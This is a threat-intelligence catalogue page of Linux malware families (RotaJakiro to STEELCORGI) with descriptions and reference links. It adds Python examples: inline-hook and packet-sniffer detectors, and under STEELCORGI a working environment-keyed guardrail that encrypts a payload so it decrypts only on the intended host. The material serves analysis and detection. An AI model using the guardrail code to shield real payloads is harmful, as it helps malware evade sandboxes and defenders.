UUID e18bf514-b978-4bef-b4d9-834a5100fced which can be used as unique global reference for Roboto in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RotaJakiro
RotaJakiro is a stealthy Linux backdoor that remained undetected from 2018 until 2021. It applies a rotating encryption scheme both to the resource data embedded in the sample and to its C2 traffic, combining AES, XOR and rotate operations with ZLIB compression.
Internal MISP references
UUID 66fb7b48-60f2-44fc-9cbe-f70e776d058b which can be used as unique global reference for RotaJakiro in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro - webarchive
- https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/ - webarchive
- https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/ - webarchive
- https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Royal Ransom (ELF)
According to Trend Micro, Royal ransomware was first observed in September 2022; the threat actors behind it are believed to be seasoned cybercriminals who were formerly part of Conti Team One.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Royal Ransom (ELF).
| Known Synonyms |
|---|
| Royal |
| Royal_unix |
Internal MISP references
UUID 4e29dae1-5a8c-4b3c-81dc-dcc0fdd3c93a which can be used as unique global reference for Royal Ransom (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html - webarchive
- https://redsense.com/publications/royal-blacksuit-how-ransomware-rebrand-reshaped-them/ - webarchive
- https://www.bleepingcomputer.com/news/security/law-enforcement-seizes-blacksuit-ransomware-leak-sites/ - webarchive
- https://unit42.paloaltonetworks.com/royal-ransomware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rshell
Internal MISP references
UUID 4947e9d3-aa13-4359-ac43-c1c436c409c9 which can be used as unique global reference for Rshell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RudeDevil
Internal MISP references
UUID 923ee959-4ea5-46c5-8926-84e41ca77ca4 which can be used as unique global reference for RudeDevil in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SALTWATER
According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) with backdoor functionality: it can upload or download arbitrary files, execute commands, and proxy and tunnel traffic. The backdoor is implemented as inline hooks on the send, recv and close functions, installed with the third-party kubo/funchook hooking library, and consists of five components, most of which the binary refers to as "Channels"; besides the proxying, these components provide the classic backdoor functionality listed above.
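A triage check for the technique described above, added here as an example (not code from Mandiant, funchook or SALTWATER): it compares the r-xp text mapping of a library in a live process with the on-disk file, and classifies the first bytes of chosen functions against the trampoline shapes an inline hooker typically writes. The trampoline patterns are x86-64 heuristics and an assumption, not funchook's exact output; the 64-byte "library", the symbol offsets and the patched prologue at the bottom are constructed.

```python
"""Inline-hook triage for libc entry points in a live process (added example)."""
import re
from typing import Dict, List, Optional, Tuple

ENDBR64 = b"\xf3\x0f\x1e\xfa"
# Assumed trampoline shapes; real hookers vary, treat a match as a lead, not proof.
HOOK_SHAPES = [
    ("jmp rel32",                  re.compile(rb"\xe9.{4}", re.S)),
    ("jmp [rip+disp32]",           re.compile(rb"\xff\x25.{4}", re.S)),
    ("push imm32; ret",            re.compile(rb"\x68.{4}\xc3", re.S)),
    ("movabs rax, imm64; jmp rax", re.compile(rb"\x48\xb8.{8}\xff\xe0", re.S)),
]


def classify_prologue(code: bytes) -> Optional[str]:
    """Name the trampoline shape at the start of a function, or None."""
    if code.startswith(ENDBR64):          # CET marker may be left in place by the hooker
        code = code[len(ENDBR64):]
    for name, pat in HOOK_SHAPES:
        if pat.match(code):
            return name
    return None


def diff_runs(live: bytes, disk: bytes) -> List[Tuple[int, int]]:
    """(offset, length) runs where the mapped text differs from the file."""
    runs, start = [], None
    n = min(len(live), len(disk))
    for i in range(n):
        if live[i] != disk[i]:
            if start is None:
                start = i
        elif start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, n - start))
    return runs


def check_functions(live: bytes, disk: bytes, symbols: Dict[str, int],
                    window: int = 16) -> Dict[str, dict]:
    """symbols: {name: offset of the function within the text mapping}
    (take them from the library's symbol table, e.g. with pyelftools)."""
    report = {}
    for name, off in symbols.items():
        report[name] = {
            "prologue": classify_prologue(live[off:off + window]),
            "patched": live[off:off + window] != disk[off:off + window],
        }
    return report


def read_text_mapping(pid: int, lib_path: str) -> Tuple[bytes, bytes]:
    """(live bytes, on-disk bytes) for the r-xp mapping of lib_path in pid.
    Needs ptrace-level access to /proc/<pid>/mem (root, typically)."""
    with open(f"/proc/{pid}/maps") as fh:
        for line in fh:
            f = line.split(maxsplit=5)
            if len(f) == 6 and f[5].strip() == lib_path and f[1].startswith("r-x"):
                lo, hi = (int(x, 16) for x in f[0].split("-"))
                file_off = int(f[2], 16)
                break
        else:
            raise LookupError(f"{lib_path} has no r-xp mapping in pid {pid}")
    with open(f"/proc/{pid}/mem", "rb") as mem:
        mem.seek(lo)
        live = mem.read(hi - lo)
    with open(lib_path, "rb") as disk:
        disk.seek(file_off)
        return live, disk.read(hi - lo)


# Constructed sample: a 64-byte "library" whose first function got a jmp rel32
# stamped over its prologue, as an inline hooker would do.
DISK_TEXT = bytes(range(64))
SYMBOLS = {"send": 0, "recv": 16, "close": 32}      # constructed offsets
LIVE_TEXT = b"\xe9\x00\x10\x00\x00" + DISK_TEXT[5:]

if __name__ == "__main__":
    print(check_functions(LIVE_TEXT, DISK_TEXT, SYMBOLS))
    print(diff_runs(LIVE_TEXT, DISK_TEXT))
```

On a real host, pass the output of read_text_mapping(pid, "/path/to/libc.so.6") and the symbol offsets into check_functions; a text mapping that differs from its file at all is already unusual for glibc and worth a closer look regardless of the prologue verdict.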
Internal MISP references
UUID d55ea436-b2c1-400c-99dc-6e35bc05438b which can be used as unique global reference for SALTWATER in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.saltwater - webarchive
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally - webarchive
- https://sansorg.egnyte.com/dd/8ekLJCPHPj/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/ - webarchive
- https://www.youtube.com/watch?v=4zaStuUdvrE - webarchive
- https://www.cisa.gov/sites/default/files/2023-09/MAR-10454006.r5.v1.CLEAR__0.pdf - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Satori
Satori is a variant of elf.mirai first detected around 2017-11-27 by 360 Netlab. It spreads in a worm-like fashion by exploiting devices reachable on TCP ports 37215 and 52869 (the latter via CVE-2014-8361, a Realtek SDK UPnP vulnerability).
Internal MISP references
UUID 9e5d83a8-1181-43fe-a77f-28c8c75ffbd0 which can be used as unique global reference for Satori in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori - webarchive
- http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/ - webarchive
- https://www.arbornetworks.com/blog/asert/the-arc-of-satori/ - webarchive
- https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/ - webarchive
- http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/ - webarchive
- https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/ - webarchive
- https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/ - webarchive
- http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SBIDIOT
Internal MISP references
UUID b4c20cf4-8e94-4523-8d48-7781aab6785d which can be used as unique global reference for SBIDIOT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sbidiot - webarchive
- https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/ - webarchive
- https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/ - webarchive
- https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SEASPY
According to CISA, this malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. It is designed to receive commands from the threat actor's command-and-control server in TCP packets. When executed, it uses a libpcap-based sniffer to monitor traffic on TCP port 25 (SMTP) and TCP port 587 for a magic packet, checking each captured packet for a hard-coded string. When a packet carrying the right sequence is seen, it establishes a TCP reverse shell to the C2 server, giving the actor arbitrary command execution on the compromised system. The malware is based on the open-source backdoor program cd00r.
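A magic-packet listener of this kind needs a packet-capture socket, which on Linux means an AF_PACKET socket that shows up in /proc/net/packet. The following host check, added here as an example (not code from CISA, Mandiant or the malware), lists every process holding such a socket by joining /proc/net/packet with the socket inodes in each process's fd table. The /proc layouts are real Linux behaviour; the sample data at the bottom (inodes, pids, the deleted binary under /tmp) is constructed.

```python
"""List processes holding AF_PACKET sockets (added example)."""
import os
import re
from typing import Dict, Iterable, List, NamedTuple, Optional

SOCK_RAW, SOCK_DGRAM = 3, 2
ETH_P_ALL = 0x0003          # Proto 0003 in /proc/net/packet: the socket sees every frame


class PacketSocket(NamedTuple):
    inode: int
    sock_type: int
    proto: int
    ifindex: int
    uid: int


def parse_proc_net_packet(text: str) -> List[PacketSocket]:
    """Parse /proc/net/packet: a header line, then one socket per line with the
    columns  sk RefCnt Type Proto Iface R Rmem User Inode."""
    socks = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 9:
            continue
        socks.append(PacketSocket(inode=int(f[8]), sock_type=int(f[2]),
                                  proto=int(f[3], 16), ifindex=int(f[4]),
                                  uid=int(f[7])))
    return socks


def map_socket_inodes(fd_links: Dict[int, Iterable[str]]) -> Dict[int, int]:
    """Invert {pid: [readlink('/proc/<pid>/fd/N'), ...]} into {socket inode: pid}."""
    owner: Dict[int, int] = {}
    for pid, links in fd_links.items():
        for link in links:
            m = re.fullmatch(r"socket:\[(\d+)\]", link)
            if m:
                owner[int(m.group(1))] = pid
    return owner


def find_sniffers(packet_text: str, fd_links: Dict[int, Iterable[str]],
                  exe_by_pid: Dict[int, str]) -> List[dict]:
    """Join both views. Every AF_PACKET holder is reported; deciding which are
    expected (tcpdump, DHCP clients, LLDP agents ...) is left to the analyst,
    because a backdoor that masquerades as a service defeats name allowlists."""
    owner = map_socket_inodes(fd_links)
    findings = []
    for s in parse_proc_net_packet(packet_text):
        pid: Optional[int] = owner.get(s.inode)
        findings.append({
            "pid": pid,                       # None: owner unreadable or already gone
            "exe": exe_by_pid.get(pid, "?") if pid is not None else "?",
            "type": "raw" if s.sock_type == SOCK_RAW else "dgram",
            "all_protocols": s.proto == ETH_P_ALL,
            "ifindex": s.ifindex, "uid": s.uid, "inode": s.inode,
        })
    return findings


def collect_live() -> List[dict]:
    """Gather the same inputs from the running host. Needs root to read other
    processes' fd tables; /proc/<pid>/exe ends in ' (deleted)' when the binary
    was removed after launch, a common trait of dropped implants."""
    with open("/proc/net/packet") as fh:
        packet_text = fh.read()
    fd_links: Dict[int, List[str]] = {}
    exe_by_pid: Dict[int, str] = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        links = []
        try:
            for fd in os.listdir(f"/proc/{pid}/fd"):
                try:
                    links.append(os.readlink(f"/proc/{pid}/fd/{fd}"))
                except OSError:        # fd closed while we were looking
                    pass
            exe_by_pid[pid] = os.readlink(f"/proc/{pid}/exe")
        except OSError:                # no permission, or process exited
            continue
        fd_links[pid] = links
    return find_sniffers(packet_text, fd_links, exe_by_pid)


# Constructed sample: two ETH_P_ALL raw sockets, one owned by tcpdump and one by
# a process whose binary was deleted from a temp directory.
SAMPLE_PACKET = """sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a1e3c2f0000 3      3    0003   2     1 0      0      40001
ffff9a1e3c2f0800 3      3    0003   2     1 0      0      40002
"""
SAMPLE_FD_LINKS = {1234: ["/dev/null", "socket:[40001]"],
                   4321: ["socket:[40002]", "/var/log/mail.log"]}
SAMPLE_EXE = {1234: "/usr/bin/tcpdump", 4321: "/tmp/.cache/mail-svc (deleted)"}

if __name__ == "__main__":
    for finding in find_sniffers(SAMPLE_PACKET, SAMPLE_FD_LINKS, SAMPLE_EXE):
        print(finding)
```

Run collect_live() as root for the real view. A raw ETH_P_ALL socket held by a process whose executable is unpackaged, lives in a temporary directory or has been deleted is the combination to escalate; a capture socket alone is normal on hosts running tcpdump, DHCP clients or monitoring agents.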
Internal MISP references
UUID a6699c42-69d8-4bdd-8dd9-72f4c80efefa which can be used as unique global reference for SEASPY in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.seaspy - webarchive
- https://www.youtube.com/watch?v=PSaix1C-UMI - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar23-209b - webarchive
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally - webarchive
- https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors - webarchive
- https://sansorg.egnyte.com/dd/8ekLJCPHPj/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/ - webarchive
- https://www.cisa.gov/sites/default/files/2023-08/MAR-10454006.r4.v2.CLEAR_.pdf - webarchive
- https://www.youtube.com/watch?v=4zaStuUdvrE - webarchive
- https://i.blackhat.com/Asia-24/Presentations/Asia-24-Chen-Chinese-APT.pdf - webarchive
- https://blog.lumen.com/the-j-magic-show-magic-packets-and-where-to-find-them/ - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
- https://www.cisa.gov/sites/default/files/2023-07/MAR-10454006.r2.v1.CLEAR_.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SECONDDATE
Internal MISP references
UUID 6d864834-cc92-47ea-b2b5-7fe6331953d7 which can be used as unique global reference for SECONDDATE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
sedexp
Internal MISP references
UUID 4e71e8ab-a34a-494f-814d-cc983a2de463 which can be used as unique global reference for sedexp in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SEXi
Ransomware, likely based on the leaked Babuk source code.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SEXi.
| Known Synonyms |
|---|
| Formosa |
| Limpopo |
| Socotra |
Internal MISP references
UUID 455156e4-57ca-45c7-bed8-a2c386aa0d5e which can be used as unique global reference for SEXi in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sexi - webarchive
- https://www.darkreading.com/threat-intelligence/sexi-ransomware-desires-vmware-hypervisors - webarchive
- https://heimdalsecurity.com/blog/powerhosts-esxi-servers-encrypted-with-new-sexi-ransomware/ - webarchive
- https://www.cybersecurity-insiders.com/proven-data-restores-powerhosts-vmware-backups-after-sexi-ransomware-attack/ - webarchive
- https://x.com/BushidoToken/status/1775843087736025175 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ShadowV2
According to Fortinet, this is a Mirai fork propagating through multiple vulnerabilities. ShadowV2 had previously been observed targeting AWS EC2 instances in campaigns disclosed in September 2025.
Internal MISP references
UUID 57d0498e-a0a1-4c04-8348-894e2851dc00 which can be used as unique global reference for ShadowV2 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ShellBind
Internal MISP references
UUID b51caf06-736e-46fc-9b13-48b0b81df4b7 which can be used as unique global reference for ShellBind in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Shishiga
Internal MISP references
UUID 51da734c-70dd-4337-ab08-ab61457e0da5 which can be used as unique global reference for Shishiga in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ShortLeash (ELF)
According to STRIKE, ShortLeash is a custom backdoor used to build an operational relay box (ORB) network. It generates a unique self-signed TLS certificate with spoofed metadata for each node. Analysis of these certificates revealed over 1,000 active nodes globally, and victimology supports attribution to China-nexus APTs.
Internal MISP references
UUID 396324ad-c2ed-4379-a248-d6f0a1f0510a which can be used as unique global reference for ShortLeash (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SideWalk (ELF)
Internal MISP references
UUID ec994efc-a8a4-4e92-ada2-e37d421baf01 which can be used as unique global reference for SideWalk (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sidewalk - webarchive
- https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/ - webarchive
- https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401 - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Silex
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silex.
| Known Synonyms |
|---|
| silexbot |
Internal MISP references
UUID bf059cb4-f73a-4181-bf71-d8da7bf50dd8 which can be used as unique global reference for Silex in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SimpleTea (ELF)
SimpleTea for Linux is an HTTP(S) RAT.
It was discovered in Q1 2023 as part of the Lazarus group's Operation DreamJob campaign for Linux. It was the payload downloaded at the end of an execution chain that started with an HSBC-themed job-offer lure, and it shared its C&C server with payloads from the 3CX incident around the same time.
It is an object-oriented project that does not run on Linux distributions without a graphical user interface. It decrypts its configuration from /home/%user%/.config/apdl.cf using 0x7E as the XOR key and uses AES-GCM to encrypt and decrypt its network traffic.
It supports basic commands covering operations on the victim's filesystem, manipulation of its configuration, file exfiltration (via ZIP archives), and the download and execution of additional tools from the attacker's arsenal. Commands are indexed by 16-bit integers starting at 0x27C3.
SimpleTea for Linux appears to be an updated version of BadCall for Linux, rewritten from C to C++: the two share class and function names.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SimpleTea (ELF).
| Known Synonyms |
|---|
| PondRAT |
| SimplexTea |
Internal MISP references
UUID e8695701-8055-4b98-bcb6-e4bb7e0a3346 which can be used as unique global reference for SimpleTea (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.simpletea - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack - webarchive
- https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA%3D%3D&mid=2247499462&idx=1&sn=7cc55f3cc2740e8818648efbec21615f - webarchive
- https://vipyrsec.com/research/elf64-rat-malware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Sindoor
Internal MISP references
UUID 459c13d0-d206-4b97-8059-1449c9fa3991 which can be used as unique global reference for Sindoor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SLAPSTICK
According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.
Internal MISP references
UUID fb3e0a1d-3a98-4cbd-ad7f-4bbb4b9a8351 which can be used as unique global reference for SLAPSTICK in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SnappyTCP
According to PwC, SnappyTCP is a simple reverse shell for Linux/Unix systems, with variants for plaintext and TLS communication. Sea Turtle has used SnappyTCP at least from 2021 through 2023.
Internal MISP references
UUID 72e045be-eba2-4571-9c6e-7d35add3d2f8 which can be used as unique global reference for SnappyTCP in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.snappy_tcp - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html - webarchive
- https://www.huntandhackett.com/blog/turkish-espionage-campaigns - webarchive
- https://blog.strikeready.com/blog/pivoting-through-a-sea-of-indicators-to-spot-turtles/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SNOWLIGHT
According to Sysdig, SNOWLIGHT is a dropper used by UNC5174 to deliver its fileless VShell payload.
Internal MISP references
UUID e108e4df-5429-402c-b70a-4fa022093598 which can be used as unique global reference for SNOWLIGHT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.snowlight - webarchive
- https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/ - webarchive
- https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SoWaT
This is an implant used by APT31 on home routers to turn them into operational relay boxes (ORBs).
Internal MISP references
UUID c2866996-d622-4ee2-b548-a6598836e5ae which can be used as unique global reference for SoWaT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sowat - webarchive
- https://twitter.com/bkMSFT/status/1417823714922610689 - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
- https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003 - webarchive
- https://imp0rtp3.wordpress.com/2021/11/25/sowat/ - webarchive
- https://twitter.com/billyleonard/status/1417910729005490177 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Spamtorte
Internal MISP references
UUID 7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0 which can be used as unique global reference for Spamtorte in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SPAWNSNARE
According to Mandiant, this is a utility written in C that targets Linux. It extracts the uncompressed Linux kernel image (vmlinux) into a file and encrypts it with AES, without needing any command-line tools.
Internal MISP references
UUID bbcfc37c-0d5c-455e-88f9-3de2df391986 which can be used as unique global reference for SPAWNSNARE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpeakUp
Internal MISP references
UUID 3ccd3143-c34d-4680-94b9-2cc4fa4f86fa which can be used as unique global reference for SpeakUp in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Specter
Internal MISP references
UUID b9ed5797-b591-4ca9-ba77-ce86308e333a which can be used as unique global reference for Specter in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter - webarchive
- https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/ - webarchive
- https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpectralBlur (ELF)
Internal MISP references
UUID a14e7ea4-668c-4990-a1a9-be99722f88f7 which can be used as unique global reference for SpectralBlur (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Speculoos
Internal MISP references
UUID df23ae3a-e10d-4c49-b379-2ea2fd1925af which can be used as unique global reference for Speculoos in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos - webarchive
- https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SprySOCKS
Internal MISP references
UUID 3b5c485b-b6a6-4586-a7dc-9e23a3b0aa5a which can be used as unique global reference for SprySOCKS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Sshdinjector
Internal MISP references
UUID 961ba66e-31de-4dcf-bbb3-27c30f404969 which can be used as unique global reference for Sshdinjector in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SSHDoor
Internal MISP references
UUID 275d65b9-0894-4c9b-a255-83daddb2589c which can be used as unique global reference for SSHDoor in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor - webarchive
- https://www.trendmicro.com/en_in/research/24/e/router-roulette.html - webarchive
- http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html - webarchive
- https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Stantinko
Internal MISP references
UUID e8c131df-ee3b-41d4-992d-71d3090d2d98 which can be used as unique global reference for Stantinko in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/ - webarchive
- https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/ - webarchive
- https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/ - webarchive
- https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/ - webarchive
- https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
STEELCORGI
According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.
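The guardrail pattern described above, as an added example (not STEELCORGI's or any vendor's code): the packed stub derives its decryption key from an environment variable, so the payload decrypts only on a host where that variable carries the expected value, and a sandbox that lacks it sees nothing but the stub. The cipher is an HMAC-SHA256 keystream with an HMAC tag, chosen only so the block runs on the standard library; the variable name STAGE, its value and the placeholder payload are constructed. The recover() function shows the analyst's side: replaying candidate values harvested from the victim's environment until the tag verifies.

```python
"""Environment-keyed execution guardrail and its analyst-side recovery (added example)."""
import hashlib
import hmac
import os
from typing import Iterable, Mapping, Optional

TAG_LEN = 16


def derive_key(env_name: str, env_value: str) -> bytes:
    """Key material comes from the environment, never from the binary itself."""
    return hashlib.sha256(f"{env_name}={env_value}".encode()).digest()


def _keystream(key: bytes, n: int) -> bytes:
    """Toy HMAC-based counter-mode keystream (assumption: not the real packer's cipher)."""
    out, ctr = bytearray(), 0
    while len(out) < n:
        out += hmac.new(key, ctr.to_bytes(8, "big"), hashlib.sha256).digest()
        ctr += 1
    return bytes(out[:n])


def seal(payload: bytes, key: bytes) -> bytes:
    """tag || ciphertext; the tag lets the stub tell 'wrong host' from 'corrupt blob'."""
    ct = bytes(a ^ b for a, b in zip(payload, _keystream(key, len(payload))))
    return hmac.new(key, ct, hashlib.sha256).digest()[:TAG_LEN] + ct


def unseal(blob: bytes, key: bytes) -> Optional[bytes]:
    """None unless the tag verifies, so a wrong key yields nothing rather than garbage."""
    tag, ct = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, len(ct))))


def run_guarded(blob: bytes, env_name: str, environ: Mapping[str, str]) -> Optional[bytes]:
    """What the packed stub does at start-up: outside the intended host the
    variable is absent or different, so the payload never decrypts."""
    value = environ.get(env_name)
    return None if value is None else unseal(blob, derive_key(env_name, value))


def recover(blob: bytes, env_name: str, candidates: Iterable[str]) -> Optional[str]:
    """Analyst side: try environment values harvested from the victim (profile
    scripts, service units, container specs) until the tag verifies."""
    for value in candidates:
        if unseal(blob, derive_key(env_name, value)) is not None:
            return value
    return None


# Constructed demo: the packer keys on STAGE=prod-eu.
PAYLOAD = b"\x7fELF stage2 (constructed placeholder payload)"
ENV_NAME, ENV_VALUE = "STAGE", "prod-eu"
BLOB = seal(PAYLOAD, derive_key(ENV_NAME, ENV_VALUE))

if __name__ == "__main__":
    print(run_guarded(BLOB, ENV_NAME, {"STAGE": "prod-eu"}))   # the payload
    print(run_guarded(BLOB, ENV_NAME, {"STAGE": "sandbox"}))   # None
    print(run_guarded(BLOB, ENV_NAME, os.environ))             # None unless STAGE is set
    print(recover(BLOB, ENV_NAME, ["dev", "staging", "prod-eu"]))
```

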